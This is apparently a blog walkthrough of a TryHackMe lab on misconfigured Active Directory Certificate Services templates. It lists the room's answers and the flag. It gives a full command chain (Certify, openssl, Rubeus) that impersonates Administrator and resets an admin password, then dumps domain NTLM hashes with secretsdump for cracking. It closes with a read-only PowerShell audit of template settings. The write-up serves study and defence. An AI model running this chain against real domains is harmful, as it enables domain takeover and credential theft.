TL;DR Walkthrough of the TryHackMe room AD Certificate Templates and a brief overview of what they missed.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
This room provides a brief overview of AD CS and the misconfigurations that can lead to abuse. It is very brief, but it recommends reading the SpecterOps whitepaper Certified Pre-Owned, which is excellent advice. The room’s title is odd as it leaves out the ‘CS’ in ‘AD CS templates’. IMHO this matters, as Certificate Services (CS) is not enabled in Active Directory (AD) by default.
The room was also a bit odd in that it stressed using the GUI to abuse a template. Here at test.local we avoid the GUI whenever it can be avoided; Group Policy is one of the few cases where we still use it. CLIs matter because anything you can accomplish in the CLI is already halfway or more towards being automated.
Like many TryHackMe rooms, this one is artificially constrained by the requirement to put everything on one VM. Therefore we are attacking AD CS while logged on interactively to the CA, which is also the DC. This makes the attack play out slightly differently as seen in Task 5.
The room I created on TryHackMe was likewise constrained. I had wanted to bring Mishky’s AD Range to TryHackMe.
— — Task 1 — -
Read the above
No answer needed
— — Task 2 — -
Read the above
No answer needed
What does the user create to ask the CA for a certificate?
Certificate Signing Request
What is the name of Microsoft’s PKI implementation?
Active Directory Certificate Services
— — Task 3 — -
What AD group will allow all AD user accounts to request a certificate?
Domain Users
What AD group will allow all domain-joined computers to request a certificate?
Domain Computers
Which EKU allows us to use the generated certificate for Kerberos authentication?
Client Authentication
Which certificate template is misconfigured based on the three provided parameters?
certipy-ad find -u 'thm@lunar.eruca.com' -p Password1\@ -dc-ip 10.10.165.85 -vulnerable -enabled -old-bloodhound
lunar-LUNDC-CA = CA Name
UserRequest = Template Name
User Request = Display Name
‘User Request’ is the answer TryHackMe wants, however the HTTPSWebServer template is also vulnerable.
Certify.exe can be used on Windows to find these vulnerable templates.
.\Certify.exe find /vulnerable
— — Task 4 — -
In which field do we inject the User Principal Name of the account we want to impersonate?
Subject Alternative Name
If we had administrative access, when adding the snap-in, which option would we select to use the machine account of the host instead of our authenticated AD account for certificate generation?
Computer account
Follow the steps above and generate your very own privilege escalation certificate
No answer needed
— — Task 5 — -
What is the value of the flag stored on the Administrator’s Desktop?
xfreerdp /v:10.10.2.232 /u:thm /p:Password1\@ /dynamic-resolution
Defender isn’t enabled on this VM, so one can simply copy/paste Certify, openssl, and Rubeus to thm’s Desktop. Certify is used for the request, the output is saved to cert.pem on the Desktop, then exported to cert.pfx using openssl, and finally used to request a ticket with Rubeus.
Normally one would pass the ticket and use it with PsTools to get a network logon to another domain system as the user we are impersonating, but in this case there is only the one VM. Therefore TryHackMe wants us to use the ticket to reset another administrator’s password.
.\CertifyII.exe request /ca:LUNDC.lunar.eruca.com\lunar-LUNDC-CA /template:HTTPSWebServer /altname:Administrator
.\openssl\openssl\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Password12!@ [Enter twice to confirm]
.\Rubeus.exe asktgt /user:Administrator /certificate:C:\Users\thm\Desktop\cert.pfx /password:Password12!@ /outfile:cert.kirbi /domain:lunar.eruca.com /dc:10.10.2.232
.\Rubeus.exe changepw /ticket:C:\Users\thm\Desktop\cert.kirbi /new:Password12!@ /dc:LUNDC.lunar.eruca.com /targetuser:lunar.eruca.com\da-clloyd
Run PowerShell_ISE or PowerShell as da-clloyd using the password we just set.
icacls C:\Users\Administrator /grant lunar\da-clloyd:F
Get-Content C:\Users\Administrator\Desktop\flag.txt
THM{AD.Certs.Can.Get.You.DA}
While we have admin, let’s dump everyone’s NTLM hashes so we can feed them into crackstation.net later. Attackers would do this to check for password re-use, as Dave in Accounting might just be using the same password for the company’s bank account.
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc da-clloyd:Password12\!\@@10.10.2.232 > ADCS.txt
One can easily copy/paste that file over to Windows and parse out just the NTLM hashes via:
$Hashes = Get-Content ".\ADCS.txt"
ForEach ($Hash in $Hashes) {
    # secretsdump lines look like domain\user:RID:LM:NT:::, so field 3 is the NT hash;
    # skip the status lines and Kerberos key lines that do not match that shape
    if ($Hash -match '^[^:]+:\d+:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}:::') {
        $Hash.Split(':')[3] | Out-File ".\AD CS\Hashes.txt" -Append
    }
}
Crackstation.net only accepts 20 hashes at a time, so we feed it in batches of 20:
Get-Content ".\Hashes.txt" | Select-Object -First 20
We get 2 hits immediately. I tried another random batch of 20 and got 1 hit.
— — Task 6 — -
Read the above
No answer needed
— — Task 7 — -
Read the above
No answer needed
Summary
Overall this room was a good introduction to AD CS. It did leave out a few key things IMHO, namely the location in AD where the template objects are stored, what their attributes look like and what they mean, and what to watch out for regarding their DACLs.
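As an added example (not code from the room or the original post), the following PowerShell audits those template objects directly: it reads them from CN=Certificate Templates,CN=Public Key Services,CN=Services in the Configuration partition, evaluates the three parameters Task 3 asks about (low-privileged enrollment, an authentication EKU, enrollee-supplied subject) together with the manager-approval and signature attributes, and flags DACL entries that give low-privileged principals enroll or write rights over a template. It assumes the RSAT ActiveDirectory module in a domain-joined session and makes no changes.

```powershell
# Added example, not code from the room or the original post. Assumes the RSAT
# ActiveDirectory module on a domain-joined host; read-only, nothing is changed.
Import-Module ActiveDirectory

$pks    = "CN=Public Key Services,CN=Services," + (Get-ADRootDSE).configurationNamingContext
$Enroll = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'    # Certificate-Enrollment extended right
$GA     = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$XR     = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$Write  = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll,WriteDacl,WriteOwner,WriteProperty'
# EKUs that let a certificate be used for Kerberos logon (the room's Client Authentication question)
$AuthOids = '1.3.6.1.5.5.7.3.2','1.3.6.1.5.2.3.4','1.3.6.1.4.1.311.20.2.2','2.5.29.37.0'
$LowPriv  = 'Domain Users','Domain Computers','Authenticated Users','Everyone','Users'

# A template only matters if some CA publishes it (the room's -enabled check)
$published = Get-ADObject -SearchBase "CN=Enrollment Services,$pks" `
    -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates |
    ForEach-Object { $_.certificateTemplates }

Get-ADObject -SearchBase "CN=Certificate Templates,$pks" -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties 'msPKI-Certificate-Name-Flag','msPKI-Enrollment-Flag','msPKI-RA-Signature','pKIExtendedKeyUsage','nTSecurityDescriptor' |
ForEach-Object {
    $t = $_; $eku = @($t.pKIExtendedKeyUsage); $enrollers = @(); $writers = @()
    foreach ($ace in $t.nTSecurityDescriptor.Access) {
        $who = $ace.IdentityReference.Value.Split('\')[-1]
        if ($ace.AccessControlType -ne 'Allow' -or $who -notin $LowPriv) { continue }
        $r = $ace.ActiveDirectoryRights
        # Enroll = the extended right above (or all extended rights via an empty GUID), or GenericAll
        if ([int]($r -band $GA) -ne 0 -or ([int]($r -band $XR) -ne 0 -and $ace.ObjectType -in @($Enroll,[guid]::Empty))) { $enrollers += $who }
        # Write access to the template object itself lets a low-privileged user re-shape it (ESC4)
        if ([int]($r -band $Write) -ne 0 -and $ace.ObjectType -eq [guid]::Empty) { $writers += $who }
    }
    $supplies = ($t.'msPKI-Certificate-Name-Flag' -band 1) -ne 0   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -> SAN is requester-controlled
    $approval = ($t.'msPKI-Enrollment-Flag' -band 2) -ne 0         # CT_FLAG_PEND_ALL_REQUESTS -> manager approval required
    $sigs     = [int]$t.'msPKI-RA-Signature'                        # number of authorized signatures required
    $authEku  = ($eku.Count -eq 0) -or (@($eku | Where-Object { $_ -in $AuthOids }).Count -gt 0)
    [pscustomobject]@{
        Template = $t.Name; Published = ($t.Name -in $published)
        EnrolleeSuppliesSubject = $supplies; AuthEKU = $authEku; ManagerApproval = $approval; Signatures = $sigs
        LowPrivEnroll = ($enrollers | Sort-Object -Unique) -join ','
        LowPrivWrite  = ($writers   | Sort-Object -Unique) -join ','
        ESC1 = ($t.Name -in $published) -and $supplies -and $authEku -and -not $approval -and $sigs -eq 0 -and $enrollers.Count -gt 0
    }
} | Where-Object { $_.ESC1 -or $_.LowPrivWrite } | Format-Table -AutoSize
```

Any authenticated domain user can read the Configuration partition, so this runs as a normal user; the output lists the templates a CA would accept with a requester-chosen SAN, and those whose DACL lets a low-privileged principal edit the template into that state.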
Like the author of this TryHackMe room, I highly recommend reading the SpecterOps whitepaper on AD CS, or at least their article summarizing it here. If you want to try a slightly more nuanced AD CS abuse, along with everything from DACL abuse to credential dumping, then try out Mishky’s AD Range, located on GitHub here.
There’s nothing inherently wrong with AD CS: it is secure by default, and it is required for smartcards, which are definitely good for security. It is important, however, to watch out for misconfigurations. Much like a misconfiguration in AD, one in AD CS can allow an attacker to seize control of the domain.
References
Certified Pre-Owned summary: https://posts.specterops.io/certified-pre-owned-d95910965cd2
Certified Pre-Owned white paper: https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
PowerShell PKI Module: https://www.pkisolutions.com/tools/pspki
Install NuGet: https://stackoverflow.com/questions/16657778/install-nuget-via-powershell-script
Add-CATemplate, publish a template: https://learn.microsoft.com/en-us/powershell/module/adcsadministration/add-catemplate?view=windowsserver2022-ps
How to enumerate AD CS: https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/
Abusing ‘Dangerous Rights’ on AD CS templates: https://github.com/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates